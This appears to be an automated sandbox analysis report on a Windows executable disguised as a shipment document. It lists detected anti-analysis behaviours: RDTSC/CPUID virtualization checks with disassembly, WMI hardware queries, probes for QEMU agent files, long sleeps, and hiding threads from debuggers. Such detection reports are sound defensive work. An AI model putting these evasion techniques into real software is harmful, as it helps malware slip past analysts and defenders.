Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342507	1_2_02342507
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342507	1_2_02342507
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4_2_00562507	4_2_00562507

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043372C		0_2_0043372C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043372C		0_2_0043372C

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Original Shipment Document.exe	Binary or memory string: ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Original Shipment Document.exe	Binary or memory string: :\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Original Shipment Document.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Original Shipment Document.exe	Binary or memory string: ROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Original Shipment Document.exe	Binary or memory string: :\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Original Shipment Document.exe	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	RDTSC instruction interceptor: First address: 000000000234250A second address: 000000000234252E instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 lfence 0x00000006 shl edx, 20h 0x00000009 nop 0x0000000a or edx, eax 0x0000000c clc 0x0000000d mov esi, edx 0x0000000f pushad 0x00000010 cld 0x00000011 mov eax, 00000001h 0x00000016 cpuid 0x00000018 bt ecx, 1Fh 0x0000001c nop 0x0000001d jc 00007F286C908C23h 0x0000001f cld 0x00000020 popad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Original Shipment Document.exe	RDTSC instruction interceptor: First address: 000000000234252E second address: 000000000234250A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F286C90903Ah 0x00000011 ret 0x00000012 add edi, edx 0x00000014 pop ecx 0x00000015 dec ecx 0x00000016 cmp ecx, 00000000h 0x00000019 jne 00007F286C909063h 0x0000001b push ecx 0x0000001c call 00007F286C90908Fh 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Original Shipment Document.exe	RDTSC instruction interceptor: First address: 000000000056250A second address: 000000000056252E instructions: 0x00000000 rdtsc 0x00000002 nop 0x00000003 lfence 0x00000006 shl edx, 20h 0x00000009 nop 0x0000000a or edx, eax 0x0000000c clc 0x0000000d mov esi, edx 0x0000000f pushad 0x00000010 cld 0x00000011 mov eax, 00000001h 0x00000016 cpuid 0x00000018 bt ecx, 1Fh 0x0000001c nop 0x0000001d jc 00007F286C908C23h 0x0000001f cld 0x00000020 popad 0x00000021 lfence 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Original Shipment Document.exe	RDTSC instruction interceptor: First address: 000000000056252E second address: 000000000056250A instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a sub edx, esi 0x0000000c cmp edx, 00000000h 0x0000000f jle 00007F286C90903Ah 0x00000011 lfence 0x00000014 rdtsc

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342507 rdtsc		1_2_02342507
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 1_2_02342507 rdtsc		1_2_02342507

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		0_2_004574D0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,		0_2_004574D0

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread delayed: delay time: 1800000	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread delayed: delay time: 1800000	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Window / User API: threadDelayed 593			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Window / User API: threadDelayed 593			Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043372C		0_2_0043372C
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_0043372C		0_2_0043372C

Source: C:\Users\user\Desktop\Original Shipment Document.exe TID: 3056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe TID: 3056	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe TID: 3056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe TID: 3056	Thread sleep time: -1800000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Original Shipment Document.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004703B0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 004703CBh		0_2_004703B0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_004703B0 GetSystemTime followed by cmp: cmp word ptr [esp], 07e4h and CTI: jnc 004703CBh		0_2_004703B0

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00408938 FindFirstFileA,GetLastError,	0_2_00408938
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405AC0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00408938 FindFirstFileA,GetLastError,	0_2_00408938
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405AC0

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00420B24 GetSystemInfo,		0_2_00420B24
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00420B24 GetSystemInfo,		0_2_00420B24

Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Original Shipment Document.exe	Binary or memory string: rogram Files\Qemu-ga\qemu-ga.exe
Source: Original Shipment Document.exe	Binary or memory string: :\Program Files\Qemu-ga\qemu-ga.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Original Shipment Document.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Original Shipment Document.exe, 0000000C.00000002.499958957.0000000000574000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMAC Layer LightWeight Filter-0000tA
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Original Shipment Document.exe	Binary or memory string: rogram Files\Qemu-ga\qemu-ga.exe
Source: Original Shipment Document.exe	Binary or memory string: :\Program Files\Qemu-ga\qemu-ga.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: Original Shipment Document.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Original Shipment Document.exe, 0000000C.00000002.499958957.0000000000574000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllMAC Layer LightWeight Filter-0000tA
Source: Original Shipment Document.exe, 0000000C.00000002.505032476.0000000005000000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information queried: ProcessInformation			Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Process information queried: ProcessInformation			Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Thread information set: HideFromDebugger	Jump to behavior
